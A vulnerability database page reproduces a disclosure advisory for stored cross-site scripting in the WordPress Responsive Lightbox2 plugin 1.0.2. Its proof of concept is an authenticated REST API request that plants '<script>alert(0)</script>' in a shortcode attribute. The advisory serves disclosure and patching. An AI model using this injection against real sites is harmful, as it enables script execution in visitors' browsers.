Lucene search
K

WordPress Responsive Lightbox2 1.0.2 Cross Site Scripting

🗓️ 17 Aug 2020 00:00:00Reported by Melbin K MathewType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 210 Views

WordPress Responsive Lightbox2 1.0.2 Cross Site Scripting vulnerability in 'hyperlink' fiel

Code
`# Exploit Title: WordPress Responsive Lightbox2 Plugin v1.0.2 - Persistent Cross-Site Scripting  
# Date: 2020-08-14  
# Vendor Homepage: https://noorsplugin.com/  
# Vendor Changelog: https://wordpress.org/plugins/responsive-lightbox2/#developers  
# Exploit Author: Melbin K Mathew (@melbinkm)  
# Author Advisory: https://melbin.in/2020/08/14/stored-xss-vulnerability-in-wordpress-responsive-lightbox2-plugin/  
# Author Homepage: https://melbin.in  
# Version: 1.0.2 and below  
  
1. Description  
  
The Easy Responsive Lightbox2 is a WordPress Plugin used to add lightbox functionality to a WordPress site. The 'hyperlink' field in used while embedding a remote image file was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the post. It is triggered when a users loads a page where the plugin shortcode is used. All WordPress websites using Responsive Lightbox2 Plugin version 1.0.2 and below are affected.  
  
2. Proof of Concept  
  
POST /w/wp-json/wp/v2/posts/208?_locale=user HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 140  
Accept: application/json, */*;q=0.1  
X-WP-Nonce: 6c6cd8b63e  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36  
X-HTTP-Method-Override: PUT  
Content-Type: application/json  
Origin: http://127.0.0.1  
Referer: http://127.0.0.1/w/wp-admin/post.php?post=208&action=edit  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1598610909%7CXmVhtKnvAI164KObiJsAbb3SYq4E7wDbCwjb2T1Q5Ot%7C187d1919d81892688985d2acd9d7c8995a974ded5282ab8d15344dae9764a405; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597422791  
Connection: close  
  
{"id":208,"content":"[lightbox2 url="http://example.com/wp-content/uploads/images/lightbox.jpg" hyperlink="<script>alert(0)</script>"]"}  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation